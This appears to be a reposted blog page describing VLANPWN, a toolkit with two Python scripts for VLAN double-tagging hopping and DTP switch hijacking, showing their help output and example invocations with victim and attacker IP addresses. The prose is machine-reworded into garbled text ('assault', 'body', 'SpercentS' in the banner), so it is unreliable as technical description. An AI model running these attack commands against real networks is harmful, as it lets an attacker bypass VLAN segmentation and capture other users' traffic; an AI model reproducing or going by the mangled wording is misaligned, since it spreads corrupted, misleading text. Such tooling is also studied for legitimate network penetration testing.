Tuesday, August 16, 2022
HomeHackerVLANPWN - VLAN Assaults Toolkit

VLANPWN – VLAN Assaults Toolkit




VLAN assaults toolkit

DoubleTagging.py – This device is designed to hold out a VLAN Hopping assault. On account of injection of a body with two 802.1Q tags, a take a look at ICMP request may also be despatched.

DTPHijacking.py – A script for conducting a DTP Change Spoofing/Hijacking assault. Sends a malicious DTP-Fascinating body, on account of which the attacker’s machine turns into a trunk channel. The influence of this assault is which you could bypass the segmentation of VLAN networks and see all of the site visitors of VLAN networks.

python3 DoubleTagging.py --help

.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s.
SS. SS. SS. SS. SS. SS. SS.
sS SpercentS sS sS SpercentS sSs. SpercentS sS SpercentS sS SpercentS SpercentS sSs. SpercentS
SS SpercentS SS SS SpercentS SS`S. SpercentS SS SpercentS SS SpercentS SpercentS SS`S. SpercentS
SS SpercentS SS SSSs. SpercentS SS `S.SpercentS SS .sS::' SS SpercentS SpercentS SS `S.SpercentS
SS SpercentS SS SS SpercentS SS `sSpercentS SS SS SpercentS SpercentS SS `sSpercentS
SS `:; SS SS `:; SS `:; SS SS `:; `:; SS `:;
SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,.
`:;;:' `:;;;;;:' :; ;:' :; ;:' `: `:;;:'`::' :; ;:'

VLAN Double Tagging inject device. Soar into one other VLAN!

Writer: @necreas1ng, <[email protected]>

utilization: DoubleTagging.py [-h] --interface INTERFACE --nativevlan NATIVEVLAN --targetvlan TARGETVLAN --victim VICTIM --attacker ATTACKER

choices:
-h, --help present this assist message and exit
--interface INTERFACE
Specify your community interface
--nativevlan NATIVEVLAN
Specify the Native VLAN ID
--targetvlan TARGETVLAN
Specify the goal VLAN ID for assault
--victim VICTIM Specify the goal IP
--attacker ATTACKER Specify the attacker IP

Instance:

python3 DoubleTagging.py --interface eth0 --nativevlan 1 --targetvlan 20 --victim 10.10.20.24 --attacker 10.10.10.54
python3 DTPHijacking.py --help

.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s.
SS. SS. SS. SS. SS. SS. SS.
sS SpercentS sS sS SpercentS sSs. SpercentS sS SpercentS sS SpercentS SpercentS sSs. SpercentS
SS SpercentS SS SS SpercentS SS`S. SpercentS SS SpercentS SS SpercentS SpercentS SS`S. SpercentS
SS SpercentS SS SSSs. SpercentS SS `S.SpercentS SS .sS::' SS SpercentS SpercentS SS `S.SpercentS
SS SpercentS SS SS SpercentS SS `sSpercentS SS SS SpercentS SpercentS SS `sSpercentS
SS `:; SS SS `:; SS `:; SS SS `:; `:; SS `:;
SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,.
`:;;:' `:;;;;;:' :; ;:' :; ;:' `: `:;;:'`::' :; ;:'

DTP Change Hijacking device. Develop into a trunk!

Writer: @necreas1ng, <[email protected]>

utilization: DTPHijacking.py [-h] --interface INTERFACE

choices:
-h, --help present this assist message and exit
--interface INTERFACE
Specify your community interface

Instance:

python3 DTPHijacking.py --interface eth0



RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments